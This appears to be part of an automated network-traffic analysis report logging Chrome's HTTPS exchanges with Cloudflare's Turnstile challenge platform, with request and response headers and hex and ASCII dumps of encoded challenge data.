                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 4a 41 59 43 39 6c 50 32 64 74 5a 55 56 49 52 47 31 37 57 57 68 66 53 34 52 35 65 30 52 63 55 30 42 44 59 34 31 36 68 45 31 2f 66 59 31 72 66 58 46 66 53 55 2b 55 67 35 46 59 6c 70 56 36 6e 5a 68 73 6b 70 71 68 63 70 4b 51 6b 58 79 59 5a 33 65 67 6d 47 36 47 68 59 2b 49 63 59 70 70 64 62 47 78 6a 48 75 31 6b 59 36 76 66 62 39 39 77 36 37 45 67 4c 50 43 68 62 2b 65 76 59 44 45 6b 4c 48 53 6e 37 79 6c 30 64 47 71 6d 64 4b 6d 72 36 76 66 71 62 71 36 7a 4c 58 66 75 73 66 6f 78 70 76 72 33 2b 71 36 78 65 44 6b 78 65 66 6a 73 50 44 43 37 4e 6a 78 74 76 44 33 74 62 76 34 30 65 7a 62 77 66 7a 79 75 41 65 36 32 64 58 4b 43 74 6f 4c 37 41 66 4b 37 63 38 4d 33 76 63 41 30 50 72 36 38 77 55 58 33 52 59 64 44 66 59 4d 45 78 33 63 32 53 51 68 41 2b 67 6a 4a 50 63 63 4a
                                                                                                    Data Ascii: JAYC9lP2dtZUVIRG17WWhfS4R5e0RcU0BDY416hE1/fY1rfXFfSU+Ug5FYlpV6nZhskpqhcpKQkXyYZ3egmG6GhY+IcYppdbGxjHu1kY6vfb99w67EgLPChb+evYDEkLHSn7yl0dGqmdKmr6vfqbq6zLXfusfoxpvr3+q6xeDkxefjsPDC7NjxtvD3tbv40ezbwfzyuAe62dXKCtoL7AfK7c8M3vcA0Pr68wUX3RYdDfYMEx3c2SQhA+gjJPccJ
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 70 54 46 6b 37 4d 33 74 50 50 46 45 39 63 33 4a 74 54 56 74 45 66 33 2b 48 66 55 75 4c 57 33 74 72 6a 58 32 53 59 33 31 4d 5a 55 35 68 5a 6c 47 64 6b 33 64 62 61 48 78 37 6c 33 61 67 64 56 32 70 71 59 5a 32 61 59 61 6f 62 48 32 79 61 5a 36 4d 6a 34 71 43 72 62 69 57 63 6e 57 58 75 4a 4b 4f 67 5a 71 76 73 73 4f 34 75 37 57 45 6c 62 72 43 69 34 33 43 77 4d 33 52 76 36 61 79 70 4a 62 48 78 5a 54 4d 73 4d 2f 55 76 74 69 32 72 36 4b 34 6e 4e 37 46 33 4b 6e 46 76 4c 2b 35 79 74 44 68 37 64 4f 77 76 64 4f 6f 72 37 62 52 36 4e 7a 38 78 74 62 71 2f 72 66 51 38 67 50 74 41 66 72 43 35 74 37 56 44 41 76 75 78 2b 58 6f 38 66 48 38 38 2b 6a 6c 38 51 6b 54 36 68 6a 77 39 74 66 65 37 4f 77 63 32 79 58 59 2b 78 4d 72 42 65 6e 6c 48 78 73 44 42 54 4d 43 4d 2b 38 30 4e 42
                                                                                                    Data Ascii: pTFk7M3tPPFE9c3JtTVtEf3+HfUuLW3trjX2SY31MZU5hZlGdk3dbaHx7l3agdV2pqYZ2aYaobH2yaZ6Mj4qCrbiWcnWXuJKOgZqvssO4u7WElbrCi43CwM3Rv6aypJbHxZTMsM/Uvti2r6K4nN7F3KnFvL+5ytDh7dOwvdOor7bR6Nz8xtbq/rfQ8gPtAfrC5t7VDAvux+Xo8fH88+jl8QkT6hjw9tfe7Owc2yXY+xMrBenlHxsDBTMCM+80NB
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 61 58 51 2b 54 59 52 33 59 6e 79 43 53 46 31 56 52 6d 4a 57 68 45 5a 5a 57 32 39 6a 5a 6c 32 4b 69 57 56 6b 64 58 74 71 61 4a 42 37 63 57 6c 37 6d 57 35 76 6c 6e 4e 39 63 6f 46 6d 67 6e 61 63 71 33 43 79 61 36 47 49 66 58 5a 77 72 71 4f 4d 6f 37 65 74 70 35 52 39 6f 4c 79 56 72 72 78 34 6e 34 57 67 6f 73 53 6f 7a 6f 76 41 30 5a 32 65 6e 37 32 39 6b 4e 4f 77 75 64 4c 48 75 38 69 76 74 4c 62 69 79 71 2f 4d 34 63 54 6f 77 4c 36 6c 7a 4b 72 64 76 75 6e 65 36 38 36 70 35 4d 6e 4c 77 2b 61 77 32 64 44 4a 74 74 72 38 32 2b 6e 37 2f 66 62 58 42 64 50 52 35 39 6e 37 43 75 76 63 2f 4f 7a 4a 37 75 2f 38 30 2f 62 54 47 67 72 70 42 77 33 59 37 43 41 69 36 76 49 54 46 39 34 6c 39 77 72 34 47 78 38 4c 49 51 6f 4c 44 69 45 51 48 66 37 77 49 7a 4c 75 4e 52 66 31 45 7a 48
                                                                                                    Data Ascii: aXQ+TYR3YnyCSF1VRmJWhEZZW29jZl2KiWVkdXtqaJB7cWl7mW5vlnN9coFmgnacq3Cya6GIfXZwrqOMo7etp5R9oLyVrrx4n4WgosSozovA0Z2en729kNOwudLHu8ivtLbiyq/M4cTowL6lzKrdvune686p5MnLw+aw2dDJttr82+n7/fbXBdPR59n7Cuvc/OzJ7u/80/bTGgrpBw3Y7CAi6vITF94l9wr4Gx8LIQoLDiEQHf7wIzLuNRf1EzH
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 6c 43 42 65 58 4a 55 64 59 67 2f 57 49 6d 42 58 46 78 39 6b 57 4e 67 6b 59 6c 73 6c 58 75 53 6a 6c 43 61 6b 6f 36 63 66 59 36 55 68 6d 53 65 6f 33 6c 6a 6a 61 32 50 68 5a 35 75 6a 59 65 79 67 4b 46 74 67 48 6d 71 71 34 39 76 74 33 69 4a 6c 59 33 42 6c 34 2f 44 78 48 36 35 74 4c 6e 45 79 63 69 59 30 4c 32 66 73 36 36 52 74 63 71 35 73 38 76 4e 30 38 6a 4a 30 70 69 35 6d 38 54 4f 70 4d 2b 64 30 64 36 2f 7a 4d 44 47 37 72 76 76 79 37 33 4b 34 76 4f 7a 35 74 66 73 73 2b 66 39 30 76 62 35 2b 66 54 51 74 64 6e 5a 31 4d 2f 56 33 75 6a 37 36 63 77 47 2b 42 44 49 7a 74 4c 77 30 75 54 67 35 2f 72 4d 30 66 7a 5a 37 42 38 55 46 42 38 6a 37 2f 63 58 39 65 49 62 46 67 73 45 43 50 77 61 37 2f 41 49 44 51 6f 46 4e 78 45 6f 4e 76 6a 79 4a 7a 51 72 48 53 6b 68 48 52 4d 78
                                                                                                    Data Ascii: lCBeXJUdYg/WImBXFx9kWNgkYlslXuSjlCako6cfY6UhmSeo3ljja2PhZ5ujYeygKFtgHmqq49vt3iJlY3Bl4/DxH65tLnEyciY0L2fs66Rtcq5s8vN08jJ0pi5m8TOpM+d0d6/zMDG7rvvy73K4vOz5tfss+f90vb5+fTQtdnZ1M/V3uj76cwG+BDIztLw0uTg5/rM0fzZ7B8UFB8j7/cX9eIbFgsECPwa7/AIDQoFNxEoNvjyJzQrHSkhHRMx
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 64 66 67 6b 46 51 6a 59 68 77 63 33 42 67 55 35 61 4c 57 58 46 39 57 5a 39 38 57 36 4a 74 62 57 2b 6c 67 61 4f 43 6e 32 42 6e 72 47 53 61 67 62 43 78 68 4b 71 79 6c 4b 47 77 73 35 6d 71 69 49 61 52 69 59 32 4a 76 35 36 53 74 4a 32 33 66 37 57 66 78 4d 47 55 67 38 36 2f 75 4e 48 4a 78 5a 47 52 76 36 43 7a 78 5a 71 33 31 70 71 6f 72 65 43 78 30 62 4f 7a 73 71 62 69 79 4f 4c 69 31 4f 66 6d 71 39 72 75 36 4f 71 77 77 65 79 7a 71 64 6a 79 38 75 50 31 32 2f 62 58 30 2b 47 30 41 62 33 64 39 66 33 53 30 2b 51 4c 36 65 76 64 44 67 33 37 34 75 72 66 43 76 66 56 46 76 44 34 45 76 50 58 42 78 6e 65 48 42 6e 76 45 2f 72 67 2b 2f 6b 6b 39 77 48 30 36 77 4d 72 37 77 7a 6b 4d 43 48 7a 41 6a 6b 6a 2b 54 67 59 4d 78 6b 56 50 43 6f 75 46 55 42 43 50 2f 68 42 47 79 64 46 43
                                                                                                    Data Ascii: dfgkFQjYhwc3BgU5aLWXF9WZ98W6JtbW+lgaOCn2BnrGSagbCxhKqylKGws5mqiIaRiY2Jv56StJ23f7WfxMGUg86/uNHJxZGRv6CzxZq31pqoreCx0bOzsqbiyOLi1Ofmq9ru6Oqwweyzqdjy8uP12/bX0+G0Ab3d9f3S0+QL6evdDg374urfCvfVFvD4EvPXBxneHBnvE/rg+/kk9wH06wMr7wzkMCHzAjkj+TgYMxkVPCouFUBCP/hBGydFC
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 6b 58 47 57 53 61 6e 46 74 6a 47 69 62 63 6c 6c 78 6a 47 71 50 65 71 46 36 67 58 5a 35 67 32 47 45 67 5a 64 38 62 36 69 45 70 6e 74 72 62 58 43 74 70 6e 43 78 6e 4b 70 76 76 38 43 56 6e 33 75 37 72 4c 4b 44 6f 5a 2b 2b 74 73 4c 45 78 61 79 4f 69 4c 43 2f 6f 4d 4b 4f 77 35 43 55 73 4e 75 77 30 37 32 55 71 64 32 59 77 37 2b 2b 6f 74 71 33 33 38 72 57 70 4b 57 70 34 71 75 39 32 64 37 43 33 4c 44 71 37 76 58 73 30 50 4c 46 30 4d 6a 56 77 4f 2f 43 41 63 33 66 2b 74 33 37 42 2f 66 63 35 67 7a 75 78 75 33 61 30 67 72 55 2f 51 51 41 43 39 44 55 38 68 44 57 48 52 4c 39 45 77 4c 72 39 79 41 58 38 79 55 6a 4b 53 45 58 41 2b 63 76 41 42 45 64 38 51 77 4f 41 78 66 30 4e 78 4d 78 50 51 63 79 45 42 51 69 50 7a 7a 39 4f 54 55 66 50 7a 73 43 42 54 68 43 52 77 6c 51 4f 31
                                                                                                    Data Ascii: kXGWSanFtjGibcllxjGqPeqF6gXZ5g2GEgZd8b6iEpntrbXCtpnCxnKpvv8CVn3u7rLKDoZ++tsLExayOiLC/oMKOw5CUsNuw072Uqd2Yw7++otq338rWpKWp4qu92d7C3LDq7vXs0PLF0MjVwO/CAc3f+t37B/fc5gzuxu3a0grU/QQAC9DU8hDWHRL9EwLr9yAX8yUjKSEXA+cvABEd8QwOAxf0NxMxPQcyEBQiPzz9OTUfPzsCBThCRwlQO1
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 55 48 4e 38 63 70 46 32 6a 6c 78 63 6a 6f 57 67 58 4a 36 53 65 36 47 44 70 48 35 39 5a 57 32 4d 6e 4b 75 6b 71 71 2b 43 6b 5a 61 75 68 6d 35 37 6e 37 75 35 66 72 36 51 6e 58 75 68 79 4c 74 37 75 6f 4b 65 6f 73 69 77 72 70 33 43 75 38 65 79 30 4b 75 53 70 74 48 4a 31 73 69 31 79 4c 36 63 6d 4a 71 2b 78 4b 58 5a 79 61 48 44 31 4d 50 73 36 73 79 76 38 63 6e 68 7a 38 37 76 39 64 53 77 78 2f 4c 56 37 62 6e 53 33 74 7a 39 41 37 72 64 35 76 62 41 41 67 44 2b 2b 73 67 43 7a 4d 6a 69 43 66 54 6d 7a 4f 30 57 38 2b 6e 6b 38 50 77 52 49 42 6b 41 45 64 6f 56 2b 4f 4c 59 42 66 6e 69 4c 41 4d 42 49 67 6f 42 2f 42 6f 6e 4a 75 77 71 42 51 59 53 4a 7a 4c 7a 43 54 33 35 46 43 73 38 4c 68 7a 36 4a 78 73 79 4d 55 49 54 51 43 73 41 53 54 6b 4f 4d 54 4d 6e 48 69 51 74 4e 44 59
                                                                                                    Data Ascii: UHN8cpF2jlxcjoWgXJ6Se6GDpH59ZW2MnKukqq+CkZauhm57n7u5fr6QnXuhyLt7uoKeosiwrp3Cu8ey0KuSptHJ1si1yL6cmJq+xKXZyaHD1MPs6syv8cnhz87v9dSwx/LV7bnS3tz9A7rd5vbAAgD++sgCzMjiCfTmzO0W8+nk8PwRIBkAEdoV+OLYBfniLAMBIgoB/BonJuwqBQYSJzLzCT35FCs8Lhz6JxsyMUITQCsASTkOMTMnHiQtNDY
                                                                                                    2025-01-14 17:38:01 UTC1369INData Raw: 47 43 42 63 59 2b 44 58 34 57 46 6b 36 56 6d 71 32 75 6e 5a 71 78 77 6e 59 53 77 71 49 69 6a 6d 4a 4b 74 68 61 70 36 74 5a 61 6f 6b 70 4b 4c 75 37 6d 34 68 6f 46 37 68 4c 71 55 7a 61 4f 46 70 61 71 77 6a 35 37 56 7a 36 61 6a 73 35 47 38 6d 38 76 4f 30 71 6e 68 30 61 7a 57 34 72 79 77 33 63 4c 5a 78 63 33 45 32 72 2b 76 79 76 44 4f 33 4b 2f 65 74 62 6a 4c 37 4d 2f 63 72 39 33 7a 33 64 32 37 76 4f 2f 78 41 75 66 45 78 51 54 6d 78 62 2f 35 42 77 55 48 35 4d 58 73 39 41 6f 49 44 39 51 53 47 66 62 77 37 67 34 51 46 42 55 4f 31 75 54 67 38 50 67 6f 41 42 6e 35 43 51 30 52 41 7a 41 73 4b 51 67 4f 37 66 50 76 4b 69 73 4a 44 6a 77 75 4c 7a 73 39 47 54 4e 43 48 79 67 44 4e 6b 51 45 4a 67 70 50 4c 78 6b 39 4d 53 49 71 54 42 38 67 55 52 51 73 45 68 77 54 58 43 34 57
                                                                                                    Data Ascii: GCBcY+DX4WFk6Vmq2unZqxwnYSwqIijmJKthap6tZaokpKLu7m4hoF7hLqUzaOFpaqwj57Vz6ajs5G8m8vO0qnh0azW4ryw3cLZxc3E2r+vyvDO3K/etbjL7M/cr93z3d27vO/xAufExQTmxb/5BwUH5MXs9AoID9QSGfbw7g4QFBUO1uTg8PgoABn5CQ0RAzAsKQgO7fPvKisJDjwuLzs9GTNCHygDNkQEJgpPLxk9MSIqTB8gURQsEhwTXC4W


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    31192.168.2.563871104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:01 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:02 UTC442INHTTP/1.1 400 Bad Request
                                                                                                    Date: Tue, 14 Jan 2025 17:38:02 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 14
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    cf-chl-out: P0yHeMpFRux0qCU1moB8PC0SBqqnnePfT9tFrbnnb9gjRETvvEgPTaaI10em+ApVprKsvgaK/tv7FidHzrk0qA==$z/pvIUSM6qsaItibOlcbRw==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65bac9df80d0-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:02 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                    Data Ascii: {"err":100230}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    32192.168.2.563872104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:02 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/901f65a8b89443b1/1736876280904/UrY5Jca_bDVuSZT HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:02 UTC200INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:02 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65bd1da943a4-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 33 00 00 00 32 08 02 00 00 00 7e 9f 74 d8 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDR32~tIDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    33192.168.2.563873104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:02 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/901f65a8b89443b1/1736876280904/UrY5Jca_bDVuSZT HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:03 UTC200INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:03 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65c0db08c459-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 33 00 00 00 32 08 02 00 00 00 7e 9f 74 d8 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDR32~tIDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    34192.168.2.563874104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:03 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/901f65a8b89443b1/1736876280907/eea66730b6a61ae8c7ed035899ba9e6fe26b348cd88b3fd403431b589468ed87/JNwjWWWvzjZMojk HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: max-age=0
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:03 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                    Date: Tue, 14 Jan 2025 17:38:03 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 1
                                                                                                    Connection: close
                                                                                                    2025-01-14 17:38:03 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 37 71 5a 6e 4d 4c 61 6d 47 75 6a 48 37 51 4e 59 6d 62 71 65 62 2d 4a 72 4e 49 7a 59 69 7a 5f 55 41 30 4d 62 57 4a 52 6f 37 59 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g7qZnMLamGujH7QNYmbqeb-JrNIzYiz_UA0MbWJRo7YcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                    2025-01-14 17:38:03 UTC1INData Raw: 4a
                                                                                                    Data Ascii: J


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    35192.168.2.563875104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:04 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 32435
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:04 UTC16384OUTData Raw: 76 5f 39 30 31 66 36 35 61 38 62 38 39 34 34 33 62 31 3d 4a 39 56 4f 55 47 6b 37 6c 70 39 41 39 41 65 39 6b 6e 6b 70 75 31 62 37 6b 38 6b 2d 6a 41 30 4f 70 6d 66 43 41 31 4f 6b 4c 6f 6b 4c 2d 41 34 41 45 39 66 47 70 41 62 41 50 56 66 48 56 41 4a 47 41 47 6d 6b 34 41 63 56 6e 41 71 4f 6b 6d 70 41 30 67 47 2d 70 59 74 4f 41 52 41 66 67 47 63 42 66 56 6c 6b 52 6d 4f 4d 6d 6f 53 6e 43 4d 41 47 37 42 50 4f 6e 38 41 6f 4f 66 6f 41 38 74 70 4b 39 35 41 4d 31 47 48 41 63 33 4e 44 6c 56 41 41 53 31 41 4a 6c 4f 41 66 5a 57 78 4f 66 2d 43 4f 41 7a 4b 44 5a 68 78 42 56 6e 78 46 4e 61 38 49 4d 46 57 73 43 57 74 44 6e 53 43 6c 6c 67 73 41 43 47 6c 5a 6e 56 4b 78 41 41 24 44 4d 57 47 63 53 76 68 55 47 57 24 59 72 45 44 68 75 41 2d 74 7a 54 38 74 25 32 62 4a 72 5a 54 45
                                                                                                    Data Ascii: v_901f65a8b89443b1=J9VOUGk7lp9A9Ae9knkpu1b7k8k-jA0OpmfCA1OkLokL-A4AE9fGpAbAPVfHVAJGAGmk4AcVnAqOkmpA0gG-pYtOARAfgGcBfVlkRmOMmoSnCMAG7BPOn8AoOfoA8tpK95AM1GHAc3NDlVAAS1AJlOAfZWxOf-COAzKDZhxBVnxFNa8IMFWsCWtDnSCllgsACGlZnVKxAA$DMWGcSvhUGW$YrEDhuA-tzT8t%2bJrZTE
                                                                                                    2025-01-14 17:38:04 UTC16051OUTData Raw: 2d 75 24 41 66 37 6e 65 41 6d 4f 41 41 79 78 67 66 6e 41 62 41 6d 4f 67 37 6a 6e 4a 32 47 4f 41 4e 79 48 65 24 76 41 33 6f 6e 61 4b 57 56 38 4f 6b 77 32 49 35 56 41 69 39 47 67 41 4b 41 47 4f 47 35 41 7a 41 62 55 6b 70 41 2b 4f 50 6d 66 36 4f 54 41 4c 67 41 6f 41 44 65 50 31 66 39 41 73 48 63 67 6b 6f 67 41 65 4c 56 47 43 41 70 4f 50 6c 4b 6d 41 48 4f 6b 6c 6b 5a 41 49 41 69 6c 41 4d 41 73 4f 45 41 47 70 31 71 4f 62 6d 47 63 41 75 41 47 39 47 2d 7a 78 4f 4a 56 47 56 35 6d 41 75 64 48 57 41 49 41 41 41 6b 5a 24 78 4a 6c 6b 46 4f 6f 41 63 41 6e 51 41 49 41 45 34 41 54 67 6a 70 4c 39 47 37 6b 6e 41 64 77 76 6d 41 54 4f 66 59 66 6f 31 67 4f 64 67 6e 46 48 4c 7a 56 57 66 6b 67 4f 4f 37 69 6b 24 67 49 41 46 6e 6b 76 41 6b 37 70 6d 41 5a 6b 43 4f 68 39 47 2b 41
                                                                                                    Data Ascii: -u$Af7neAmOAAyxgfnAbAmOg7jnJ2GOANyHe$vA3onaKWV8Okw2I5VAi9GgAKAGOG5AzAbUkpA+OPmf6OTALgAoADeP1f9AsHcgkogAeLVGCApOPlKmAHOklkZAIAilAMAsOEAGp1qObmGcAuAG9G-zxOJVGV5mAudHWAIAAAkZ$xJlkFOoAcAnQAIAE4ATgjpL9G7knAdwvmATOfYfo1gOdgnFHLzVWfkgOO7ik$gIAFnkvAk7pmAZkCOh9G+A
                                                                                                    2025-01-14 17:38:04 UTC322INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:04 GMT
                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                    Content-Length: 26336
                                                                                                    Connection: close
                                                                                                    cf-chl-gen: ThOgBCtqnBuIJCt3tclCTmqXhkrzHh+Y2iW7mAd+q2jHeq5aGPBkOmyVqI8ksOEd$fsk5favb1f2ui6LvDSkPnQ==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65c82a300c7c-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
